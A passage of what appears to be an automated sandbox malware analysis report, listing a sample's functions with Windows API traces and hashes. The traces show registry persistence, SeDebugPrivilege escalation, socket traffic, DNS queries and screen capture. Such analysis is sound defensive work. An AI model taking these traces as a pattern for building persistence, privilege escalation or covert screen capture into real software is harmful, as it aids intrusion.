                                                                                                                                                                                                                                                                                            • Instruction ID: c9e267c1070ec395bb0912e1c45191ba70df067031acd037c9e0f9dad43f8bcd
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea8d534bd058ac273b81175436ace048efae155f41b8cd6d2257d95aecc7b931
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA0184B6650215BAEB24A766DD46F9F76688B80B20F31003FF605B71C1DDB89A41916C
                                                                                                                                                                                                                                                                                            Function 00408545 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50sleepregistryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 004010A2: RegCreateKeyExA.KERNELBASE(80000001,004099F4,00000000,00000000,00000000,000F003F,00000000,?,00000000,?,0040855B,Software\Z0BAZwxx\,00000000,?,?,004099F4), ref: 004010CA
                                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(0000000A,?,00000000,?,?,?,004099F4), ref: 00408572
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406EFB: LoadLibraryW.KERNELBASE(kernel32.dll,00000000,0ABF23CD,?,?,00000000), ref: 00406F81
                                                                                                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(00000000,004099F4,00000000,00000001,0040D10C,00000000,?,?,004099F4), ref: 0040859D
                                                                                                                                                                                                                                                                                              • Part of subcall function 00401050: RegCloseKey.KERNELBASE(ez@,?,00407A65,00000000), ref: 00401064
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseCreateLibraryLoadSleepValue
                                                                                                                                                                                                                                                                                            • String ID: Software\Z0BAZwxx\
                                                                                                                                                                                                                                                                                            • API String ID: 508966606-1921705251
                                                                                                                                                                                                                                                                                            • Opcode ID: 1507e43ee96fb4c06f7ceee3f7d59e785763dcb903d114485ec9cde194086286
                                                                                                                                                                                                                                                                                            • Instruction ID: 9938723e0093edba29856d576959375a33cfa6f80bfd5a629303d5fda331d746
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1507e43ee96fb4c06f7ceee3f7d59e785763dcb903d114485ec9cde194086286
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6F044266002047AEE1067A6DC47FAE2798DB817A8F20007FF105BA0C1DEB95E4152A8
                                                                                                                                                                                                                                                                                            Function 00408482 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 004010A2: RegCreateKeyExA.KERNELBASE(80000001,004099F4,00000000,00000000,00000000,000F003F,00000000,?,00000000,?,0040855B,Software\Z0BAZwxx\,00000000,?,?,004099F4), ref: 004010CA
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406EFB: LoadLibraryW.KERNELBASE(kernel32.dll,00000000,0ABF23CD,?,?,00000000), ref: 00406F81
                                                                                                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(00000000,0040D110,00000000,00000001,?,00000000,?,00409B79,?), ref: 004084D9
                                                                                                                                                                                                                                                                                              • Part of subcall function 00401050: RegCloseKey.KERNELBASE(ez@,?,00407A65,00000000), ref: 00401064
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseCreateLibraryLoadValue
                                                                                                                                                                                                                                                                                            • String ID: Software\Z0BAZwxx\
                                                                                                                                                                                                                                                                                            • API String ID: 4148158921-1921705251
                                                                                                                                                                                                                                                                                            • Opcode ID: 079801fb10b5b25a11377870f1dfc546aa286ea61802b1a6752b3b1cc64841b2
                                                                                                                                                                                                                                                                                            • Instruction ID: 9dd2b46add90bb4c9c695123c47c7fac413969a986b6bfaef1ddb5798ef7d6eb
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 079801fb10b5b25a11377870f1dfc546aa286ea61802b1a6752b3b1cc64841b2
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0CF09636500304BAFE20A7A6DC47F9E3798DB81BA4F20007FF505BA0C1DEB9AE41925C
                                                                                                                                                                                                                                                                                            Function 00401050 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 11registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(ez@,?,00407A65,00000000), ref: 00401064
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                                            • String ID: ez@
                                                                                                                                                                                                                                                                                            • API String ID: 3535843008-307298357
                                                                                                                                                                                                                                                                                            • Opcode ID: 76390ae0bed861b0e037cce240818d75561f70313286bc32234e024495660c76
                                                                                                                                                                                                                                                                                            • Instruction ID: 4c84069e2ef98658d5186f5adce7be50019fbdd61ac68ad264a878f959edd915
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76390ae0bed861b0e037cce240818d75561f70313286bc32234e024495660c76
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7B092360843083AEA102AE6FC06A693B0C9B40A75F51046AF60E99492DDB6AAA16088
                                                                                                                                                                                                                                                                                            Function 00407286 Relevance: 3.1, APIs: 2, Instructions: 104networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            • recv.WS2_32(00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00407F38,00000000,00000000), ref: 004072C3
                                                                                                                                                                                                                                                                                            • recv.WS2_32(?,?,00000400,00000000), ref: 0040732E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: recv$AllocVirtual
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2370969716-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 3a51e633106f484ece2fcd3ca808fba01e84403f4fbbe61aa3821a41c2b79207
                                                                                                                                                                                                                                                                                            • Instruction ID: db8cd6ebcdcc9337e0ce1156ce8be60a7b34194076e82308930da628e4c4106b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a51e633106f484ece2fcd3ca808fba01e84403f4fbbe61aa3821a41c2b79207
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7331F772D08205BEFB315BB5CC80A5E7BA59F84314F25807BED04F62D1EA38E941E65A
                                                                                                                                                                                                                                                                                            Function 0040557E Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406EFB: LoadLibraryW.KERNELBASE(kernel32.dll,00000000,0ABF23CD,?,?,00000000), ref: 00406F81
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNELBASE(C8D54834,?,?,00000000), ref: 004055B7
                                                                                                                                                                                                                                                                                              • Part of subcall function 004074BF: LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,?,?,?,?,?,?,004055BE,?,?,00000000), ref: 00407510
                                                                                                                                                                                                                                                                                              • Part of subcall function 004074BF: AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 00407543
                                                                                                                                                                                                                                                                                            • _beginthreadex.MSVCRT ref: 00405629
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AdjustErrorLibraryLoadLookupModePrivilegePrivilegesTokenValue_beginthreadex
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 595208359-0
                                                                                                                                                                                                                                                                                            • Opcode ID: ca24d91df4eef7d9672899915baa7d20e6e513fcf5e6c82319b162c42e7174ae
                                                                                                                                                                                                                                                                                            • Instruction ID: d84fbb3d75e8cf0f967d0c5e31a60ca7cce9eb9b614bd4d222c19c8a6ddae697
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca24d91df4eef7d9672899915baa7d20e6e513fcf5e6c82319b162c42e7174ae
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5511A7315047412BD32077B6DC59E7B7698DFC1720F100A3FB5E6E61C1EE7C894585AA
                                                                                                                                                                                                                                                                                            Function 00407388 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00407286: recv.WS2_32(00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00407F38,00000000,00000000), ref: 004072C3
                                                                                                                                                                                                                                                                                              • Part of subcall function 00407286: recv.WS2_32(?,?,00000400,00000000), ref: 0040732E
                                                                                                                                                                                                                                                                                            • closesocket.WS2_32(00000000,?,?,00000000,00407F38,00000000,00000000), ref: 004073FA
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: recv$closesocket
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4196379120-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 49687872994e1b20c67728f4252d28e076a44b58eaf92a073bae059d876c6b26
                                                                                                                                                                                                                                                                                            • Instruction ID: 99e77747aa5181a8cf159a99dd79525f8e184ed58c29ea420a7589f6c073a402
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 49687872994e1b20c67728f4252d28e076a44b58eaf92a073bae059d876c6b26
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C0188329082156FEF11AE65EC02A9F37949F41754F10013AFD01F62C2EA78AE11D2AA
                                                                                                                                                                                                                                                                                            Function 00408248 Relevance: 1.6, APIs: 1, Instructions: 50networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DnsQuery_A.DNSAPI(00000000,00000001,00000100,00000000,00000000,00000000,?,?,0040833E,0040C698,00000000,00000104,00000000,00000000,00000000), ref: 0040826C
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Query_
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 428220571-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 43233cfc2d3cf2fd5984d9f0b6e5559adad4a0a228ac07ca0c817f7ad6d61cd0
                                                                                                                                                                                                                                                                                            • Instruction ID: 5c7bea5c504106bdbca3c99cf92aa18e666d6d3997db29912fea7ae9729bbba8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43233cfc2d3cf2fd5984d9f0b6e5559adad4a0a228ac07ca0c817f7ad6d61cd0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0F0F4327002017AEA209759EC06FABB359CB85F50F10056EF981FF2C0DEF4ED418198
                                                                                                                                                                                                                                                                                            Function 004064D0 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00407DFB,000000FF,00000000,00000000,00000000,00000000,753C73E0,00000206,00000000,?,?,00407DFB,?), ref: 004064E9
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocByteCharMultiVirtualWide
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1277181490-0
                                                                                                                                                                                                                                                                                            • Opcode ID: d1456055df678da3754626ec683021799b227b979ab447f4b929fba41e1d1778
                                                                                                                                                                                                                                                                                            • Instruction ID: 3f7d88b5208c627646c50de5bde980f2e45d9f368264ffd58a8ec27b99098767
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1456055df678da3754626ec683021799b227b979ab447f4b929fba41e1d1778
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1F0C2B6508219BFAB119AF5DCC5CBF7AACDA462B8321023AF521A2280D5359D005270
                                                                                                                                                                                                                                                                                            Function 004010A2 Relevance: 1.5, APIs: 1, Instructions: 20registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegCreateKeyExA.KERNELBASE(80000001,004099F4,00000000,00000000,00000000,000F003F,00000000,?,00000000,?,0040855B,Software\Z0BAZwxx\,00000000,?,?,004099F4), ref: 004010CA
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Create
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                                                                                                                                            • Opcode ID: f20f2ddb427b5351f11daf537abb747c4f1df89915f5cad5abea8d208865d939
                                                                                                                                                                                                                                                                                            • Instruction ID: b84a4d7f944386b7a6a5ec655b84d4ed03378f31deb8c07fdd86a349c91a327b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f20f2ddb427b5351f11daf537abb747c4f1df89915f5cad5abea8d208865d939
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0D092B61642097EFA1D1BD1DC1BEBA360DC700660F10421EB70969486A8E2B96091A8
                                                                                                                                                                                                                                                                                            Function 004071BC Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • send.WS2_32(00000000,00407F38,?,00000000,?,004073C2,00000000,?,00000000,00000000), ref: 004071D8
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: send
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2809346765-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 9692ad589aaf1c71e6ffef7171213cdc5ccf9a682ced0e4de8c61ede48fc3008
                                                                                                                                                                                                                                                                                            • Instruction ID: ee6758d7e97d97e706e7e23b1a8217dcaaf6e27925eb23e5cf3745f009df8b75
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9692ad589aaf1c71e6ffef7171213cdc5ccf9a682ced0e4de8c61ede48fc3008
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39D0123614030A7FDF112EE5EC47F9D3B159B44730F204A26FA389D0E1DA76E5B16644
                                                                                                                                                                                                                                                                                            Function 004010CE Relevance: 1.5, APIs: 1, Instructions: 10networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • socket.WS2_32(00000002,00000001,00000006,004071EE,00000000,00408E7E,?,00407F38,00000000,00000000), ref: 004010E2
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: socket
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 98920635-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 269767dc4108a2976a1e455d6b1a05b83f1cbf2f85d7dbc6d5c9ebdea5c3bfd6
                                                                                                                                                                                                                                                                                            • Instruction ID: 1f163dbfd7e094060222fd45024614ec1b0eff3c3550cf05be6ba8fd19d1728c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 269767dc4108a2976a1e455d6b1a05b83f1cbf2f85d7dbc6d5c9ebdea5c3bfd6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2B0925269170029F83022A8AC1BF1601024780F10F20041A7202AC0C2DCD910901004
                                                                                                                                                                                                                                                                                            Function 00404C49 Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 8895482e8f915d38abb0812e59731ed23840194c1bc98f57d4a94bfadd2e804f
                                                                                                                                                                                                                                                                                            • Instruction ID: 1835ebb0d144d01dedb531f6d2363fec1b5415826f403158021aa18822db3c64
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8895482e8f915d38abb0812e59731ed23840194c1bc98f57d4a94bfadd2e804f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29C08C212853083AF91026E4DC03F29360C8B00E18F200029B718984C1D8F5A950108A
                                                                                                                                                                                                                                                                                            Function 00404C17 Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,004079DA,8EB39475,?,?,?), ref: 00404C34
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 8895482e8f915d38abb0812e59731ed23840194c1bc98f57d4a94bfadd2e804f
                                                                                                                                                                                                                                                                                            • Instruction ID: 1835ebb0d144d01dedb531f6d2363fec1b5415826f403158021aa18822db3c64
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8895482e8f915d38abb0812e59731ed23840194c1bc98f57d4a94bfadd2e804f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29C08C212853083AF91026E4DC03F29360C8B00E18F200029B718984C1D8F5A950108A
                                                                                                                                                                                                                                                                                            Function 00401068 Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,3A9ACC72,?,00403009,?,00000000,--->,00000000,0040C8B0), ref: 00401084
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                            • Opcode ID: abf219990c05cc52fa270ae43039840bf81ed5a03029e5253079193630f3a93c
                                                                                                                                                                                                                                                                                            • Instruction ID: 2348c54a596006875acd0bd27b6c9e0c3d8a9767c0e406219e29a3b77020a9c5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: abf219990c05cc52fa270ae43039840bf81ed5a03029e5253079193630f3a93c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44C02B300043086AEB103FF4CC01B2837ACEB40300F104C3DB6C9A9880DA78A4111A88
                                                                                                                                                                                                                                                                                            Function 00401038 Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(?,?,0040754D,00000000), ref: 0040104C
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                            • Opcode ID: c616879ca8beb9febbd6c6ed8c8f85931741760ad75b61fc0facbb7961a15954
                                                                                                                                                                                                                                                                                            • Instruction ID: 39fc295b9bb004c84752f560cb020b576ba7b031957f6090c04b83def4e6c7a3
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c616879ca8beb9febbd6c6ed8c8f85931741760ad75b61fc0facbb7961a15954
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5FB0922160820D2AAE102AF5EC0A82A3749DA40614F20443EB95AC5551EDB9A9622088

                                                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                                                            Function 00409018 Relevance: 16.6, APIs: 11, Instructions: 64windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040903B
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000000), ref: 00409048
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000001), ref: 0040904F
                                                                                                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00409055
                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 0040906B
                                                                                                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000), ref: 0040906E
                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0040907B
                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00409089
                                                                                                                                                                                                                                                                                            • BitBlt.GDI32(?,00000000,00000000,?,?,00000000), ref: 00409097
                                                                                                                                                                                                                                                                                              • Part of subcall function 00408F76: GetModuleHandleW.KERNEL32(GdiPlus.dll,GdipCreateBitmapFromHBITMAP), ref: 00408F9B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00408F76: GetProcAddress.KERNEL32(00000000), ref: 00408FA4
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004090AD
                                                                                                                                                                                                                                                                                            • GdiplusShutdown.GDIPLUS(?), ref: 004090B6
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CompatibleCreateGdiplusMetricsObjectSystem$AddressBitmapDeleteHandleModuleProcSelectShutdownStartup
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1316946987-0
                                                                                                                                                                                                                                                                                            • Opcode ID: ec4ad26ec3b17bdd8a1a0492a70f62f53c99c11f0f289bd6f89d352edc94f413
                                                                                                                                                                                                                                                                                            • Instruction ID: a5f2901407d85d7cba3cc58ac3e22e3bea5212f00905233112d836d94ad6ba44
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ec4ad26ec3b17bdd8a1a0492a70f62f53c99c11f0f289bd6f89d352edc94f413
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DF11AC72C01228EBDB11AFE1DD499EFBFB9EF49320F10412AF901B2160D6759651DFA8
                                                                                                                                                                                                                                                                                            Function 00401363 Relevance: 12.1, APIs: 8, Instructions: 69threadmemoryprocessCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
